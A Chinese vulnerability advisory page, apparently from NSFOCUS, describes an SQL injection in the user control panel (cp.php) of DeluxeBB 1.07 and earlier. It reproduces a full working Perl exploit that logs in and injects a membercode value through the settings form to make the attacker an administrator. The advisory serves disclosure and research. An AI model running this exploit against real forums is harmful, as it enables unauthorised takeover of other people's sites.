首页 -> 安全研究
安全研究
安全漏洞
DeluxeBB cp.php远程SQL注入漏洞
发布日期:2006-06-23
更新日期:2006-06-26
受影响系统:
DeluxeBB DeluxeBB <= 1.07描述:
BUGTRAQ ID: 18648
DeluxeBB是一款基于PHP的论坛程序。
DeluxeBB对用户请求的处理存在输入验证漏洞,远程攻击者可能利用此漏洞对服务执行SQL注入攻击,导致非授权访问控制数据库,获取服务的管理用户权限。
DeluxeBB的用户控制面板cp.php脚本中存在SQL注入漏洞,允许用户通过在升级设置中注入查询更改访问级别,获得管理权限。
<*来源:Hessam-x (Hessamx@Hessamx.net)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=115134338726438&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# DeluxeBB <= 1.07 Create Admin Exploit
#
## www.h4ckerz.com / www.hackerz.ir / www.aria-security.net
# ./2006-6-25
### Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net
use IO::Socket;
use LWP::UserAgent;
use HTTP::Cookies;
$host = $ARGV[0];
$uname = $ARGV[1];
$passwd = $ARGV[2];
$url = "http://".$host;
print q(
###########################################################
# DeluxeBB <= 1.07 Create Admin Exploit #
# www.hackerz.ir - www.h4ckerz.com #
################### Coded By Hessam-x #####################
);
if (@ARGV < 3) {
print " # usage : hx.pl [host&path] [uname] [pass]\n";
print " # E.g : hx.pl www.milw0rm.com/deluxebb/ str0ke 123456\n";
exit();
}
print " [~] User/Password : $uname/$passwd \n";
print " [~] Host : $host \n";
print " [~] Login ... ";
# Login In DeluxeBB <= 1.07 Create Admin Exploit
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->cookie_jar( $cookie_jar );
$res = $xpl->post($url.'misc.php',
Content => [
"sub" => "login",
"name" => "$uname",
"password" => "$passwd",
"submit" => "Log-in",
"redirect" => "",
"expiry" => "990090909",
],);
if($cookie_jar->as_string =~ /memberpw=(.*?);/) {
print "successfully .\n";
} else {
print "UNsuccessfully !\n";
print " [-] Can not Login In $host !\n";
print $cookie_jar->as_string;
exit();
}
# Creat Admin :)
$req = $xpl->get($url.'cp.php?sub=settings&xemail=h4x0r@h4x0r.net&xhideemail=0&xmsn=h4x0r\',membercode=\'5&xicq=&xaim=&xyim=&xlocation=&xsite=&languagex=English&skinx=default&xthetimeoffset=0&xthedateformat=d.m.y&xthetimeformat=12&invisiblebrowse=0&markposts=15&submit=Update');
$tst = $xpl->get($url.'index.php');
if ($tst->as_string =~ /Admin Cp/) {
print " [+] You Are Admin Now !!";
} else {
print " [-] Exploit Failed !";
}
# milw0rm.com [2006-06-25]
建议:
厂商补丁:
DeluxeBB
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.deluxebb.com/
浏览次数:3590
严重程度:10(网友投票)
绿盟科技给您安全的保障